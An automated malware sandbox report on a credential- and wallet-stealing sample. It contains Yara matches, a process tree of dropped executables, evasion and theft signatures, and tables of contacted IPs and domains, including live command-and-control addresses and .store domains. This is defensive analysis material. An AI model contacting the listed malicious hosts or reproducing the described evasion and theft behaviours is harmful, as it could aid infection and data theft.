Source: Yara match File source: 29.2.b76bb5cee7.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.0.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.b76bb5cee7.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2721535335.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.3018675741.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2767324044.000000000135E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2766160676.0000000000AA1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.3018412209.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.3003208783.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2961232929.0000000000AA1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2875184699.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2862123172.0000000005220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2967959553.000000000150B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2875355609.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.2854773209.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.2855075944.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.3003112537.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: b76bb5cee7.exe PID: 5712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b76bb5cee7.exe PID: 6444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6456, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546479 Sample: file.exe Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 116 thumbystriw.store 2->116 118 presticitpo.store 2->118 120 39 other IPs or domains 2->120 142 Suricata IDS alerts for network traffic 2->142 144 Found malware configuration 2->144 146 Antivirus detection for dropped file 2->146 148 18 other signatures 2->148 11 file.exe 2 2->11         started        16 efe6fe4127.exe 2->16         started        18 skotes.exe 2->18         started        20 4 other processes 2->20 signatures3 process4 dnsIp5 130 necklacedmny.store 188.114.96.3, 443, 49709, 49710 CLOUDFLARENETUS European Union 11->130 132 185.215.113.16, 49735, 49887, 49948 WHOLESALECONNECTIONSNL Portugal 11->132 110 C:\Users\user\...\YQEN9A9QU4P1VROBPV5YS.exe, PE32 11->110 dropped 112 C:\Users\user\...\99Q4Y3O9GBOXYTDVM9GPHI.exe, PE32 11->112 dropped 204 Query firmware table information (likely to detect VMs) 11->204 206 Found many strings related to Crypto-Wallets (likely being stolen) 11->206 208 Tries to evade debugger and weak emulator (self modifying code) 11->208 224 2 other signatures 11->224 22 99Q4Y3O9GBOXYTDVM9GPHI.exe 4 11->22         started        26 YQEN9A9QU4P1VROBPV5YS.exe 9 1 11->26         started        114 C:\Users\user\...\9XHYSBI0DT1C8ABJDSO.exe, PE32 16->114 dropped 210 Tries to harvest and steal ftp login credentials 16->210 212 Tries to harvest and steal browser information (history, passwords, etc) 16->212 214 Tries to steal Crypto Currency Wallets 16->214 216 Hides threads from debuggers 18->216 218 Tries to detect sandboxes / dynamic malware analysis system (registry check) 18->218 220 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->220 222 Binary is likely a compiled AutoIt script file 20->222 28 firefox.exe 20->28         started        31 firefox.exe 20->31         started        33 taskkill.exe 20->33         started        35 4 other processes 20->35 file6 signatures7 process8 dnsIp9 96 C:\Users\user\AppData\Local\...\skotes.exe, PE32 22->96 dropped 150 Antivirus detection for dropped file 22->150 152 Detected unpacking (changes PE section rights) 22->152 154 Machine Learning detection for dropped file 22->154 162 3 other signatures 22->162 37 skotes.exe 4 25 22->37         started        156 Modifies windows update settings 26->156 158 Disables Windows Defender Tamper protection 26->158 160 Tries to evade debugger and weak emulator (self modifying code) 26->160 164 3 other signatures 26->164 134 youtube.com 142.250.185.206 GOOGLEUS United States 28->134 136 prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 GOOGLEUS United States 28->136 138 2 other IPs or domains 28->138 42 firefox.exe 28->42         started        44 firefox.exe 28->44         started        46 firefox.exe 31->46         started        48 conhost.exe 33->48         started        50 conhost.exe 35->50         started        52 conhost.exe 35->52         started        54 conhost.exe 35->54         started        56 conhost.exe 35->56         started        file10 signatures11 process12 dnsIp13 122 185.215.113.43, 49866, 49881, 49943 WHOLESALECONNECTIONSNL Portugal 37->122 98 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 37->98 dropped 100 C:\Users\user\AppData\...\deecb7b612.exe, PE32 37->100 dropped 102 C:\Users\user\AppData\...\b76bb5cee7.exe, PE32 37->102 dropped 104 5 other malicious files 37->104 dropped 166 Antivirus detection for dropped file 37->166 168 Detected unpacking (changes PE section rights) 37->168 170 Machine Learning detection for dropped file 37->170 172 5 other signatures 37->172 58 efe6fe4127.exe 2 37->58         started        62 b76bb5cee7.exe 13 37->62         started        65 deecb7b612.exe 37->65         started        67 num.exe 37->67         started        124 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 46->124 126 push.services.mozilla.com 34.107.243.93 GOOGLEUS United States 46->126 128 5 other IPs or domains 46->128 69 firefox.exe 46->69         started        71 firefox.exe 46->71         started        file14 signatures15 process16 dnsIp17 106 C:\Users\user\...\U2242U1STHGPPKHG.exe, PE32 58->106 dropped 108 C:\...\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe, PE32 58->108 dropped 188 Antivirus detection for dropped file 58->188 190 Multi AV Scanner detection for dropped file 58->190 192 Query firmware table information (likely to detect VMs) 58->192 202 5 other signatures 58->202 73 KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe 58->73         started        76 U2242U1STHGPPKHG.exe 58->76         started        140 185.215.113.206, 50005, 80 WHOLESALECONNECTIONSNL Portugal 62->140 194 Detected unpacking (changes PE section rights) 62->194 196 Machine Learning detection for dropped file 62->196 198 Tries to evade debugger and weak emulator (self modifying code) 62->198 200 Binary is likely a compiled AutoIt script file 65->200 78 taskkill.exe 65->78         started        80 taskkill.exe 65->80         started        82 taskkill.exe 65->82         started        84 3 other processes 65->84 file18 signatures19 process20 signatures21 174 Antivirus detection for dropped file 73->174 176 Detected unpacking (changes PE section rights) 73->176 178 Tries to detect sandboxes and other dynamic analysis tools (window names) 73->178 186 2 other signatures 73->186 180 Machine Learning detection for dropped file 76->180 182 Tries to evade debugger and weak emulator (self modifying code) 76->182 184 Hides threads from debuggers 76->184 86 conhost.exe 78->86         started        88 conhost.exe 80->88         started        90 conhost.exe 82->90         started        92 conhost.exe 84->92         started        94 conhost.exe 84->94         started        process22
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.185.206
 youtube.com United States
15169 GOOGLEUS false
34.149.100.209
 prod.remote-settings.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.243.93
 push.services.mozilla.com United States
15169 GOOGLEUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
188.114.96.3
 necklacedmny.store European Union
13335 CLOUDFLARENETUS true
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
34.120.208.123
 telemetry-incoming.r53-2.services.mozilla.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
star-mini.c10r.facebook.com 157.240.253.35 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
twitter.com 104.244.42.65 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
services.addons.mozilla.org 151.101.1.91 true
dyna.wikimedia.org 185.15.59.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.185.206 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
youtube-ui.l.google.com 142.250.185.174 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
reddit.map.fastly.net 151.101.1.140 true
ipv4only.arpa 192.0.0.170 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
necklacedmny.store 188.114.96.3 true
normandy-cdn.services.mozilla.com 35.201.103.21 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
www.reddit.com unknown unknown
spocs.getpocket.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
presticitpo.store unknown unknown
support.mozilla.org unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
fadehairucw.store unknown unknown
www.facebook.com unknown unknown
detectportal.firefox.com unknown unknown
normandy.cdn.mozilla.net unknown unknown
thumbystriw.store unknown unknown
shavar.services.mozilla.com unknown unknown
crisiwarny.store unknown unknown
www.wikipedia.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ true
    		unknown
    fadehairucw.store true
      		unknown
      http://185.215.113.206/6c4adf523b719729.php true
        		unknown
        founpiuer.store true
          		unknown
          presticitpo.store true
            		unknown
            navygenerayk.store true
              		unknown